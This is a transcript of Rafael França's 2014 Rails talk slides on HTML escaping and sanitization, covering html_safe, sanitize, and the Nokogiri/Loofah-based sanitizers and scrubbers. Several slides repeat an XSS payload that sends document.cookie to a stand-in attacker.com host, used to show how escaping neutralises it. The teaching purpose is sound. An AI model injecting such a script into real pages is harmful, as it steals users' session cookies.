Rails: The hidden parts

Rafael França

April 26, 2014

Transcript

  1. Rails the hidden parts

  2. Rafael França @rafaelfranca

  5. InheritedResources, Responders, show_for, I18nAlchemy, rails-api

  6. Carlos Antonio Rafael França José Valim 
 Co-founder of Plataformatec

    http://rubyonrails.org/core
  7. http://elixir-lang.org/

  8. Core Team Member

  11. Rails has a lot of cool features

  12. Encrypted cookies Active Record Queries View Helpers Migrations Generators Notifications

    Constant missing hooks
  13. Convention over configuration

  14. Some features we use without even knowing

  15. HTML escaping

  17. Photo <%= @photo.description %>

  18. User input

        Hello loser!
        <script>
          document.write(
            '<img src="http://www.attacker.com/' +
            document.cookie +
            '">'
          );
        </script>
  19. What will happen?

  20. Unescaped value

        Hello loser!
        <script>
          document.write(
            '<img src="http://www.attacker.com/' +
            document.cookie +
            '">'
          );
        </script>
  21. Call html_escape: <%=h @photo.description %>

  22. Escaped result

        Hello loser!
        &lt;script&gt;
          document.write(
            &#39;&lt;img src=&quot;http://www.attacker.com/&#39; +
            document.cookie +
            &#39;&quot;&gt;&#39;
          );
        &lt;/script&gt;
  23. OMG! I forgot to use this!

  24. Don’t worry, today you are safe

  25. Rails 3+ escapes the result

  26. User input: This dog is <b>so cute</b>!

  27. Escaped result: This dog is &lt;b&gt;so cute&lt;/b&gt;!
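
The escaping shown on these slides can be tried outside a Rails view. A minimal sketch, assuming only Ruby's standard library: `ERB::Util.html_escape` is the method the slides call, while the variable names and the one-line attack string are made up for this illustration.

```ruby
require "erb"

# User-supplied text, as in the photo description example.
user_input = "This dog is <b>so cute</b>!"

# html_escape replaces &, <, >, " and ' with HTML entities.
escaped = ERB::Util.html_escape(user_input)
puts escaped  # => This dog is &lt;b&gt;so cute&lt;/b&gt;!

# Hypothetical one-line version of the cookie-stealing input.
attack = %q{<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>}
escaped_attack = ERB::Util.html_escape(attack)
puts escaped_attack
```

Once escaped, the browser renders the markup as visible text instead of running it.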

  28. All strings are unsafe unless you mark them as safe

  29. HTML safety check

        string = "my string"
        # => "my string"

        string.html_safe?
        # => false

        safe_string = string.html_safe
        # => "my string"

        safe_string.html_safe?
        # => true
  32. Rendering safe strings

        my_html_string = "<b>HTML</b>"
        # => "<b>HTML</b>"

        ERB::Util.html_escape my_html_string
        # => "&lt;b&gt;HTML&lt;/b&gt;"

        ERB::Util.html_escape my_html_string.html_safe
        # => "<b>HTML</b>"
  35. In most cases you don’t need to worry about marking strings as safe
  36. Mark as safe: <%= raw @photo.description %>
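
How a safety flag and escaping fit together can be sketched in plain Ruby. Both `TrustedString` and `escape_unless_safe` are hypothetical names invented for this illustration; Rails has its own implementation, and this only mimics the behaviour shown on the slides.

```ruby
require "erb"

# Hypothetical stand-in for a string that remembers it was marked as safe.
# This is NOT the Rails class, only an imitation of the idea.
class TrustedString < String
  def html_safe?
    true
  end
end

# Hypothetical helper: escape everything except values marked as safe.
def escape_unless_safe(value)
  if value.respond_to?(:html_safe?) && value.html_safe?
    value
  else
    ERB::Util.html_escape(value.to_s)
  end
end

plain   = "<b>HTML</b>"
trusted = TrustedString.new("<b>HTML</b>")

puts escape_unless_safe(plain)    # => &lt;b&gt;HTML&lt;/b&gt;
puts escape_unless_safe(trusted)  # => <b>HTML</b>
```

The default path is the safe one: a value passes through untouched only when someone marked it explicitly.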

  37. HTML sanitization

  38. Take your text and remove the HTML tags you do not allow

  39. Calling sanitize: <%= sanitize @user.description %>

  40. Safe value

        helper.sanitize(
          "This dog is <b>so cute</b>!"
        )
        # => "This dog is <b>so cute</b>!"
  41.

        helper.sanitize(%{
          Hello loser!
          <script>
            document.write(
              '<img src="http://www.attacker.com/' +
              document.cookie +
              '">'
            );
          </script>
        })
        # Hello loser!
        # <img src=\"http://www.attacker.com/&#39; +
        # document.cookie +
        # &#39;\">'
        # );
  42. How it works

  43. Tokenizer

  44.

        bad_string = <<STRING
        Hello loser!
        <script>
          document.write(
            '<img src="http://www.attacker.com/' +
            document.cookie +
            '">'
          );
        </script>
        STRING
  45.

        tokenizer = HTML::Tokenizer.new(bad_string)
        tokenizer.next
        # => "Hello loser!\n"

        tokenizer.next
        # => "<script>"

        tokenizer.next
        # => "\n document.write(\n '"

        tokenizer.next
        # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">"

        tokenizer.next
        # => "'\n );\n"

        tokenizer.next
        # => "</script>"

        tokenizer.next
        # => "\n"

        tokenizer.next
        # => nil
  54.

        def tokenize(text)
          tokenizer = HTML::Tokenizer.new(text)
          result = []

          while token = tokenizer.next
            node = HTML::Node.parse(nil, 0, 0, token, false)
            result << node
          end

          result
        end
  58. Nodes

        nodes = tokenize(bad_string)
        # => [#<HTML::Text:..., …]

        nodes.map { |node| node.class }
        # => [HTML::Text, HTML::Tag, HTML::Text,
        #     HTML::Tag, HTML::Text, HTML::Tag, HTML::Text]
  59. Tokens

        # [HTML::Text - "Hello loser!\n"]
        # [HTML::Tag - "<script>"]
        # [HTML::Text - "\n document.write(\n '"]
        # [HTML::Tag - "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">"]
        # [HTML::Text - "'\n );\n"]
        # [HTML::Tag - "</script>"]
        # [HTML::Text - "\n"]
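
The token stream on these slides can be approximated in a few lines of plain Ruby. This is a sketch of regular-expression tokenizing in general, not the code of `HTML::Tokenizer`: the `Token` struct, this `tokenize` method, and both patterns are assumptions made for the illustration.

```ruby
require "strscan"

# Hypothetical token type: kind is :tag or :text.
Token = Struct.new(:kind, :source)

# Split markup into tag and text tokens using two regular expressions.
def tokenize(markup)
  scanner = StringScanner.new(markup)
  tokens = []
  until scanner.eos?
    if (tag = scanner.scan(/<[^>]*>/))
      tokens << Token.new(:tag, tag)
    elsif (text = scanner.scan(/[^<]+/))
      tokens << Token.new(:text, text)
    else
      # A "<" that is never closed: treat the remainder as text.
      tokens << Token.new(:text, scanner.rest)
      scanner.terminate
    end
  end
  tokens
end

bad_string = <<~STRING
  Hello loser!
  <script>
    document.write(
      '<img src="http://www.attacker.com/' +
      document.cookie +
      '">'
    );
  </script>
STRING

tokens = tokenize(bad_string)
tokens.each { |token| p [token.kind, token.source] }
kinds = tokens.map(&:kind)
p kinds  # => [:text, :tag, :text, :tag, :text, :tag, :text]
```

Note that the `<img ...>` inside the JavaScript string literal is reported as a tag, the same misreading visible in the token list on the slides.
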
  68. Sanitizer

  69.

        def tokenize(text)
          tokenizer = HTML::Tokenizer.new(text)
          result = []
          while token = tokenizer.next
            node = HTML::Node.parse(nil, 0, 0, token, false)
            process_node(node, result)
          end
          result
        end

        def process_node(node, result)
          result << node.to_s
        end
  71. Sanitizers • FullSanitizer • LinkSanitizer • WhiteListSanitizer

  72. Full Sanitizer

        def process_node(node, result)
          result << node.to_s if node.class == HTML::Text
        end
  73. Problems • code is hard to maintain • uses regular expressions to tokenize the string • very error prone • changing this code can open security holes
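
Why regular-expression tokenizing is error prone can be seen in a small experiment. The sketch below is an assumed simplification, not the old Rails code: `TOKEN_PATTERN` and `strip_tags` are hypothetical names, and the attack string is a shortened one-line variant of the one on the slides.

```ruby
# Assumed simplification: one regular expression separates tags from text.
TOKEN_PATTERN = /<[^>]*>|[^<]+/

# Keep only the text tokens, in the spirit of the Full Sanitizer slide.
def strip_tags(markup)
  markup.scan(TOKEN_PATTERN).reject { |token| token.start_with?("<") }.join
end

puts strip_tags("<b>Bold</b> no more!")  # => Bold no more!

# The pattern cannot know that the contents of <script> are code, so
# pieces of the JavaScript are kept as if they were ordinary text.
attack = %q{Hi! <script>document.write('<img src="x">');</script>}
leaked = strip_tags(attack)
puts leaked  # => Hi! document.write('');
```

The tags are gone but fragments of the script remain, which is the kind of surprise a real HTML parser avoids by treating the script element as a single node.
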
  74. Rails Html Sanitizer rafaelfranca/rails-html-sanitizers

  75. Google Summer of Code

  76. @kaspth

  77. Powered by Nokogiri

  78.

        doc = Nokogiri::HTML::DocumentFragment.parse(bad_string)

        doc.children.each { |n| p n }
        # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n">
        # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[
        # =>   #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n...
        # => ]>
  81. Powered by Loofah

  82.

        doc = Loofah.fragment(bad_string)

        remove_script = Loofah::Scrubber.new do |node|
          node.remove if node.name == "script"
        end

        doc.scrub!(remove_script)

        doc.to_text
        # => "Hello loser!\n"
  86. How the new implementation works

  87. Tokenizer

  88. It is Nokogiri

  89. Sanitizers • FullSanitizer • LinkSanitizer • WhiteListSanitizer

  90. FullSanitizer

        full_sanitizer = Rails::Html::FullSanitizer.new

        full_sanitizer.sanitize(
          "<b>Bold</b> no more! <a href='more.html'>See more here</a>..."
        )
        # => Bold no more! See more here...
  93. LinkSanitizer

        link_sanitizer = Rails::Html::LinkSanitizer.new

        link_sanitizer.sanitize(
          '<a href="example.com">Only the link text will be kept.</a>'
        )
        # => Only the link text will be kept.
  96. WhiteListSanitizer

        white_list_sanitizer = Rails::Html::WhiteListSanitizer.new

        white_list_sanitizer.sanitize(bad_string)
        # => "Hello loser!\n"

        good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..."

        white_list_sanitizer.sanitize(good_string)
        # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..."

        white_list_sanitizer.sanitize(good_string, tags: %w(b))
        # => "<b>Bold</b> no more! See more here..."

        white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
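
The effect of the `tags:` option can be imitated in plain Ruby to show what an allow-list means. This is an illustration only and not safe for real input: it recognises tags with a regular expression (the approach the talk moves away from) and, unlike the output on the slide, drops every attribute. `TAG_PATTERN` and `allow_tags` are hypothetical names.

```ruby
# Assumed simplification: tags are found with a regular expression and all
# attributes are discarded. Illustration only, do not use on real input.
TAG_PATTERN = %r{<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>}

# Keep tags whose name is in allowed_tags (without attributes); drop the rest.
def allow_tags(markup, allowed_tags)
  markup.gsub(TAG_PATTERN) do
    closing = Regexp.last_match(1)
    name = Regexp.last_match(2).downcase
    allowed_tags.include?(name) ? "<#{closing}#{name}>" : ""
  end
end

good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..."

puts allow_tags(good_string, %w[b])    # => <b>Bold</b> no more! See more here...
puts allow_tags(good_string, %w[b a])  # => <b>Bold</b> no more! <a>See more here</a>...
```

Everything not named in the list is removed, so a new or unexpected tag is rejected by default instead of slipping through.
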
  102. Custom Sanitizer

        class MySanitizer < Rails::Html::Sanitizer
          def sanitize(html, options = {})
            Loofah.scrub_fragment(html, MyCustomScrubber.new).to_s
          end
        end
  103. Scrubbers • PermitScrubber • TargetScrubber

  104. Scrubbers

        span2div = Loofah::Scrubber.new do |node|
          node.name = "div" if node.name == "span"
        end

        class Span2Div < Loofah::Scrubber
          def scrub(node)
            node.name = "div" if node.name == "span"
          end
        end
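
A scrubber is essentially a visitor that is handed every node of the parsed tree. The sketch below shows that pattern without any gems; it is not how Loofah is implemented. `Element`, `SpanToDiv`, and `scrub_tree` are hypothetical names, and the tree is built by hand where a real sanitizer would get it from a parser.

```ruby
# Hypothetical, minimal element tree; children are Elements or plain strings.
Element = Struct.new(:name, :children) do
  def to_s
    "<#{name}>#{children.join}</#{name}>"
  end
end

# A scrubber here is any object that responds to scrub(node).
class SpanToDiv
  def scrub(node)
    node.name = "div" if node.name == "span"
  end
end

# Visit every element depth-first and hand it to the scrubber.
def scrub_tree(node, scrubber)
  return unless node.is_a?(Element)

  scrubber.scrub(node)
  node.children.each { |child| scrub_tree(child, scrubber) }
end

tree = Element.new("p", ["Hello ", Element.new("span", ["world"])])
scrub_tree(tree, SpanToDiv.new)
puts tree  # => <p>Hello <div>world</div></p>
```

Because the scrubber only ever sees whole nodes, the rule stays a one-liner and never has to deal with string parsing.
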
  107. Scrubbers

        white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)

  108. Scrubbers

        class ArticleScrubber < Loofah::Scrubber
          def scrub(node)
            if node.name == "gallery"
              replacement = render(partial: 'gallery')
              node.replace Loofah.fragment(replacement)
            end
          end
        end
  112. Problems • Some HTML 5 documents are invalid for Nokogiri • Nokogiri requires libxml, which may not work on Windows • Some applications may break when upgrading
  113. And there are a lot more hidden features

  114. Try to understand them

  115. Contribute back

  116. The best feature of Rails

  117. Is our community

  118. Thank you! Rafael França • github.com/rafaelfranca • twitter.com/rafaelfranca